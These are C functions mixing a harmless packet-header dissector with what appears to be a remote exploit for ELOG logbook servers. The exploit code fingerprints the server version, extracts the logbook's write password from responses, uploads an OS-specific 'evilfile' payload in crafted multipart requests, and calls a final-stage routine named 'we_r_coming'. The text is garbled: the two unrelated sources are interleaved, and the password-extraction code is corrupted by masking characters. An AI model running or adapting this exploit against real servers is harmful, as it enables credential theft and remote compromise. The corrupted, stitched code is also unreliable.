void packetDetails_ethernet(uint8_t *packetData) { ethernetFrame = (ethernetFrame_t*) packetData; printf("Ethernet frame\n"); PRINTINFO("Destination MAC"); for(i=0; i<5; i++) printf("%02" PRIx8 ":", ethernetFrame->destinationMac[i]); printf("%02" PRIx8 "\n", ethernetFrame->destinationMac[5]); PRINTINFO("Source MAC"); for(i=0; i<5; i++) printf("%02" PRIx8 ":", ethernetFrame->sourceMac[i]); printf("%02" PRIx8 "\n", ethernetFrame->sourceMac[5]); PRINTINFO("Type"); printf("%s (0x%04" PRIx16 ")\n", determineEthernetProtocol(swap_uint16(ethernetFrame->type)), swap_uint16(ethernetFrame->type)); switch(swap_uint16(ethernetFrame->type)){ case 0x0800: // IP protocol packetDetails_ip(packetData + ETHERNET_FRAME_LENGTH); break; case 0x0806: // ARP protocol packetDetails_arp(packetData + ETHERNET_FRAME_LENGTH); break; } }
char *make_request_header(char *logbookname,char *glob_boundary,int which) { glob_boundary = boundary; char request[REQUESTSIZE]; char *p = request; char boun_buf[BOUNSIZE]; char host_name[50]; char *url_enc = urlencode(logbookname); if(gethostname(host_name,sizeof(host_name)) == -1) { perror("gethostname"); exit(EXIT_FAILURE); } sprintf(boun_buf,"%s",boundary); if(which){ PRINTINFO(MSGQUERY,debug); } strncpy(request,POSTREQ,sizeof(POSTREQ)); sprintf(request + strlen(request), "%s/",url_enc); strcat(request,HTTPVER); sprintf(request + strlen(request), "Content-Type: multipart/form-data; boundary=%s\r\n",glob_boundary); sprintf(request + strlen(request), "Host: %s\r\n", host_name); sprintf(request + strlen(request), "User-Agent: ELOG\r\n"); sprintf(request + strlen(request), "Authorization: Basic %s\r\n",encuserandpass); sprintf(request + strlen(request), "Content-Length: %d\r\n\r\n", content_length); bzero(encoded_url,sizeof(encoded_url)); return(p); }
void packetDetails_udp(uint8_t *packetData) { udpHeader = (udpHeader_t*)(packetData); printf("UDP header\n"); PRINTINFO("Source port"); PRINTPORT(udpHeader->sourcePort); PRINTINFO("Destination port"); PRINTPORT(udpHeader->destinationPort); PRINTINFO("Length"); PRINTUINT16(swap_uint16(udpHeader->length)); PRINTINFO("Checksum"); PRINTHEX16(swap_uint16(udpHeader->checksum)); packetDetails_data(packetData + UDP_LENGTH, swap_uint16(udpHeader->length) - UDP_LENGTH); }
char *make_random_boundary(void) { PRINTINFO(MSGBOUNDARY,debug); char bound_buf[BOUNSIZE]; char *p; p = bound_buf; srand((unsigned) time(NULL)); bzero(bound_buf,sizeof(bound_buf)); sprintf(bound_buf,"---------------------------%04X%04X%04X",rand(),rand(),rand()); return(p); }
void packetDetails_tcp(uint8_t *packetData) { tcpHeader = (tcpHeader_t*)(packetData); printf("TCP header\n"); PRINTINFO("Source port"); PRINTPORT(tcpHeader->sourcePort); PRINTINFO("Destination port"); PRINTPORT(tcpHeader->destinationPort); PRINTINFO("Sequence number"); PRINTHEX32(swap_uint32(tcpHeader->sequenceNumber)); PRINTINFO("Acknowledgement number"); PRINTHEX32(swap_uint32(tcpHeader->acknowledgementNumber)); // Flags uint16_t flag = swap_uint16(tcpHeader->flags); PRINTFLAG("Header length"); PRINTUINT8(((flag & TCP_headerLength) >> TCP_headerLengthPos)*4); PRINTFLAG("Reserved"); PRINTHEX16((flag & TCP_reserved) >> TCP_reservedPos); PRINTFLAG("URG"); printf("%s\n", flagSetOrNot((flag & TCP_urg) >> TCP_urgPos)); PRINTFLAG("ACK"); printf("%s\n", flagSetOrNot((flag & TCP_ack) >> TCP_ackPos)); PRINTFLAG("PSH"); printf("%s\n", flagSetOrNot((flag & TCP_push) >> TCP_pushPos)); PRINTFLAG("RST"); printf("%s\n", flagSetOrNot((flag & TCP_reset) >> TCP_resetPos)); PRINTFLAG("SYN"); printf("%s\n", flagSetOrNot((flag & TCP_syn) >> TCP_synPos)); PRINTFLAG("FIN"); printf("%s\n", flagSetOrNot((flag & TCP_fin) >> TCP_synPos)); PRINTINFO("Window size"); PRINTUINT16(swap_uint16(tcpHeader->windowSize)); PRINTINFO("Checksum"); PRINTHEX16(swap_uint16(tcpHeader->checksum)); PRINTINFO("Urgent pointer"); PRINTUINT16(swap_uint16(tcpHeader->urgentPointer)); packetDetails_data(packetData + TCP_LENGTH, (swap_uint16(ipHeader->totalLength) - (ipHeader->headerLength)*4 - TCP_LENGTH)); }
void packetDetails_arp(uint8_t *packetData) { arpHeader = (arpHeader_t*)(packetData); printf("ARP header \n"); PRINTINFO("Hardware type"); PRINTHEX16(swap_uint16(arpHeader->hardwareType)); PRINTINFO("Protocol type"); printf("%s (0x%04" PRIx16 ")\n", determineEthernetProtocol(swap_uint16(arpHeader->protocolType)), swap_uint16(arpHeader->protocolType)); PRINTINFO("Hardware address length"); PRINTUINT8(arpHeader->hwAddrLength); PRINTINFO("Protocol address length"); PRINTUINT8(arpHeader->protoAddrLength); PRINTINFO("Opcode"); PRINTUINT8(swap_uint16(arpHeader->opcode)); PRINTINFO("Sender MAC"); for(i=0; i<5; i++) printf("%02" PRIx8 ":", arpHeader->senderHwAddr[i]); printf("%02" PRIx8 "\n", arpHeader->senderHwAddr[5]); PRINTINFO("Sender IP"); for(i=0; i<3; i++) printf("%" PRIu8 ".", arpHeader->senderIpAddr[i]); printf("%" PRIu8 "\n", arpHeader->senderIpAddr[3]); PRINTINFO("Target MAC"); for(i=0; i<5; i++) printf("%02" PRIx8 ":", arpHeader->targetHwAddr[i]); printf("%02" PRIx8 "\n", arpHeader->targetHwAddr[5]); PRINTINFO("Target IP"); for(i=0; i<3; i++) printf("%" PRIu8 ".", arpHeader->targetIpAddr[i]); printf("%" PRIu8 "\n", arpHeader->targetIpAddr[3]); }
int check_for_clear_sector(char *hostname,unsigned short port,char *logbook,int flag) { struct sockaddr_in rem_addr; char sendbuf[SENDBUFSIZE]; char *sendbufp; char getbuf[GETBUFSIZE]; char *reqbuf; char notfound[100]; int yes; int total; int sock; int flagchoice; struct timeval w_t; fd_set read_fd; int total_fd; PRINTINFO(MSGSECTOR,debug); LOGBOOKNOTFOUND(notfound,logbook); HEAD: bzero(&w_t,sizeof(w_t)); w_t.tv_sec = TIMEOUT; w_t.tv_usec = 0; if(flag == 0) flagchoice = NOTUPLOADME; else flagchoice = UPLOADME; sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(sock < 0) { perror("socket"); exit(1); } if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) { perror("setsockopt"); close(sock); exit(1); } memset(&(rem_addr.sin_zero),'\0',8); rem_addr.sin_family = AF_INET; rem_addr.sin_port = htons(port); rem_addr.sin_addr.s_addr = get_host_ip(hostname); if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) { fprintf(stderr,"[-] Can not Connect to server!\n"); exit(1); } sendbufp = make_http_content(flagchoice,logbook); reqbuf = make_request_header(logbook,boundary,0); strcpy(sendbuf,reqbuf); strcat(sendbuf,sendbufp); if( (send(sock,sendbuf,sizeof(sendbuf),0)) < 0 ) { perror("send"); exit(-1); close(sock); } FD_ZERO(&read_fd); FD_SET(sock,&read_fd); if( (total_fd = select(sock + 1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0) { perror("select"); close(sock); exit(-1); } if(FD_ISSET(sock,&read_fd)) { if( (total = recv(sock,getbuf,sizeof(getbuf),0)) < 1) { if(errno == EWOULDBLOCK ){ NPRINTINFO(REMDOWN); PRINTINFO(REMCRASHED,1); close(sock); exit(-1); } close(sock); exit(1); } if(strstr(getbuf,INVALIDURL)) { fprintf(stderr,"[-] Invalid URL Bitch, Type the Correct Path\n"); close(sock); exit(-1); } if(strstr(getbuf,AUTHORIZED_DENY)) { fprintf(stderr,"[-] Type User name and Password for login Bitch\n"); close(sock); exit(-1); } if(strstr(getbuf,notfound)) { fprintf(stderr,"[-] NO %s LOGBOOK DEFINED BITCH\n",logbook); close(sock); exit(-1); } if(strstr(getbuf,ASKEDPASS)) { NPRINTINFO(PASSALERT); crack_the_code(hostname,port,logbook); close(sock); bzero(getbuf,sizeof(getbuf)); goto HEAD; } if(strstr(getbuf,ATTOPTERR)) { PRINTINFO(READOPTION,1); close(sock); bzero(getbuf,sizeof(getbuf)); spy_attr_options(hostname,port,logbook); goto HEAD; } if(strstr(getbuf,ATTERR)) { get_missing_attributes(getbuf,ATTERR,MISSED[globcount].addr); ATTNOTFOUND(MISSED[globcount].addr); MAKINGATT (MISSED[globcount].addr); globcount++; bzero(getbuf,sizeof(getbuf)); re_check_sector(hostname,port,logbook,flag); } if(strstr(getbuf,SECTOR_CLEAR)) { PRINTINFO(CLEARAREA,1); close(sock); do_last_stage(hostname,port,logbook); we_r_coming(hostname); } } return(1); }
char *make_http_content(int choice,char *logbookname) { char *pazzword = TESTPASS_DECODED; char passencode[50]; char *text = NULL; const char *experiment = logbookname; const char *att_file = shbuffer; const char *testuser = TESTUSER; const char *subject = LOGSUBJECT; char *l_content = content; int include_evilfile = 0; int attrcount = 0; int j; if(choice == UPLOADME) include_evilfile = 1; else if (choice == NOTUPLOADME) include_evilfile = 0; if(id == 4) att_file = fedorabuf; if((id == 5) || (id == 2)) att_file = debianbuffer; if(id == 6){ att_file = windozebuf; text = windozetext; } if(id != 6) text = bigbuffer; sprintf(boundary,"%s",make_random_boundary()); PRINTINFO(MSGCONTENT,debug); base64_encode(pazzword,passencode); strcpy(content,boundary); strcat(content, "\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nSubmit\r\n"); sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"wpwd\"\r\n\r\n%s\r\n",boundary,wpassbufenc); sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"unm\"\r\n\r\n%s\r\n",boundary,testuser); sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"upwd\"\r\n\r\n%s\r\n", boundary, passencode); sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"exp\"\r\n\r\n%s\r\n", boundary, experiment); if((attrcount = is_there_attribute())) { for( j = 0; j < attrcount ; j++) { sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n", boundary,MISSED[j].addr,TRASH[j].addr); } } sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"Subject\"\r\n\r\n%s\r\n", boundary, subject); sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"Text\"\r\n\r\n%s\r\n", boundary, text); if(include_evilfile){ sprintf(content + strlen(content), "%s\r\nContent-Disposition: form-data; name=\"attfile\";filename=\"%s\"\r\n", boundary, att_file); } sprintf(content + strlen(content),"%s\r\n", boundary); content_length = strlen(content); content[content_length] = '\0'; return(l_content); }
void get_server_version(char *hostname,unsigned short port) { const unsigned char *version_chec = VERSION_CHECKER; const unsigned char *version_request = CHECKELOG; int yes = 1; int get_total = 0; int send_total = 0; char info_buf[INBUF]; int sock_req; int ready; struct sockaddr_in rem_addr; fd_set read_fd; struct timeval w_t; w_t.tv_sec = TIMEOUT; w_t.tv_usec = 0; PRINTINFO(MSGVER,1); sock_req = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(sock_req < 0) { perror("socket"); exit(EXIT_FAILURE); } if(setsockopt(sock_req,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) { perror("setsockopt"); exit(1); } memset(&(rem_addr.sin_zero),'\0',8); rem_addr.sin_family = AF_INET; rem_addr.sin_port = htons(port); rem_addr.sin_addr.s_addr = get_host_ip(hostname); if( connect(sock_req,(struct sockaddr *)&rem_addr,sizeof(struct sockaddr)) == -1) { err(1,NULL); exit(1); } FD_ZERO(&read_fd); FD_SET(sock_req,&read_fd); if ((send_total = send(sock_req,version_request,strlen(version_request),0)) == -1) { perror("send"); exit(1); } if((ready = select(sock_req+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){ perror("select"); exit(1); } if(FD_ISSET(sock_req,&read_fd)) { if( (get_total = recv(sock_req,info_buf,sizeof(info_buf)-1,0)) == -1) { perror("recv"); exit(1); } else if(get_total <= 0){ fprintf(stderr,"[-]Can not receive information\n"); exit(1); } info_buf[get_total] = '\0'; int i; char linebuf[LINEBUFSIZ]; char lastbuf[LINEBUFSIZ]; bzero(linebuf,sizeof(linebuf)); bzero(lastbuf,sizeof(lastbuf)); char *p = (char *)&linebuf[0]; char *k = (char *)&lastbuf[0]; char *z; if((z = strstr(info_buf,version_chec)) != NULL) { strncpy(p,z,500); for(i = 0; (*p != '-') && (*p != '\n'); i++){ *k++ = *p++; } PRINTINFO(lastbuf,debug); close(sock_req); return; } } NPRINTINFO(NOTELOG); close(sock_req); exit(1); }
void crack_the_code(char *hostname,unsigned short port,char *logbook) { int soc; int ready; int yes = 0; char request[REQUESTSIZE]; fd_set read_fd; struct timeval w_t; struct sockaddr_in rem_addr; int i = 0; int n = 0; char response[6900]; char wpassbuf[100]; char *z; char *p = wpassbuf; char *w = wpassbufenc; bzero(wpassbuf,sizeof(wpassbuf)); bzero(wpassbufdec,sizeof(wpassbufdec)); make_spy_header(hostname,port,request,logbook); w_t.tv_sec = TIMEOUT; w_t.tv_usec = 0; soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(soc < 0) { perror("socket"); exit(1); } if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) { perror("setsockopt"); close(soc); exit(1); } memset(&(rem_addr.sin_zero),'\0',8); rem_addr.sin_family = AF_INET; rem_addr.sin_port = htons(port); rem_addr.sin_addr.s_addr = get_host_ip(hostname); PRINTINFO(GETINGPASS,1); if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) { fprintf(stderr,"[-] Can not Connect to server!\n"); exit(1); } if( (send(soc,request,strlen(request),0)) < 0 ){ perror("send"); exit(-1); close(soc); } FD_CLR(soc,&read_fd); FD_ZERO(&read_fd); FD_SET(soc,&read_fd); if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){ perror("select read socket"); close(soc); exit(1); } if(FD_ISSET(soc,&read_fd)){ i = recv(soc, response, 30, 0); if (i < 0) { perror("Cannot receive response"); return ; } n = i; while (i > 0) { i = recv(soc, response + n, 30, MSG_DONTWAIT); if (i > 0) n += i; if(i <= 0) break; } response[strlen(response)] = '\0'; close(soc); fflush(stdout); if((z = strstr(response,"Write Password="******""GREEN"[+]Write Password = "******" "GREEN"%s"DEFAULT"\n",wpassbufdec); } }
void packetDetails_ip(uint8_t *packetData) { printf("IP header \n"); ipHeader = (ipHeader_t*)(packetData); PRINTINFO("Version"); PRINTUINT8(ipHeader->version); PRINTINFO("Header length"); PRINTUINT8(ipHeader->headerLength * 4); PRINTINFO("Type of service"); PRINTHEX8(ipHeader->typeOfService); PRINTINFO("Total length"); PRINTUINT16(swap_uint16(ipHeader->totalLength)); PRINTINFO("Identification"); printf("0x%04" PRIx16 " (%" PRIu16 ")\n", swap_uint16(ipHeader->identification), swap_uint16(ipHeader->identification)); // Flags uint16_t flag = swap_uint16(ipHeader->flags); PRINTFLAG("Reserved bit"); printf("%s\n", flagSetOrNot((flag & IP_reservedFlag) >> IP_reservedFlagPos)); PRINTFLAG("Don't fragment"); printf("%s\n", flagSetOrNot((flag & IP_dontFragment) >> IP_dontFragmentPos)); PRINTFLAG("More fragments"); printf("%s\n", flagSetOrNot((flag & IP_moreFragments) >> IP_moreFragmentsPos)); PRINTFLAG("Fragment offset"); PRINTHEX16(flag & IP_fragmentOffset); PRINTINFO("Time to live"); PRINTUINT8(ipHeader->timeToLive); PRINTINFO("Protocol"); printf("%s (%" PRIu8 ")\n", determineIpProtocol(ipHeader->protocol), ipHeader->protocol); PRINTINFO("Checksum"); PRINTHEX16(swap_uint16(ipHeader->checksum)); PRINTINFO("Source address"); for(i=0; i<3; i++) printf("%" PRIu8 ".", ipHeader->sourceAddress[i]); printf("%" PRIu8 "\n", ipHeader->sourceAddress[3]); PRINTINFO("Destination address"); for(i=0; i<3; i++) printf("%" PRIu8 ".", ipHeader->destinationAddress[i]); printf("%" PRIu8 "\n", ipHeader->destinationAddress[3]); uint8_t sizeOfIP = ipHeader->headerLength * 4; switch(ipHeader->protocol) { case 6: packetDetails_tcp(packetData + sizeOfIP); break; case 17: packetDetails_udp(packetData + sizeOfIP); break; } }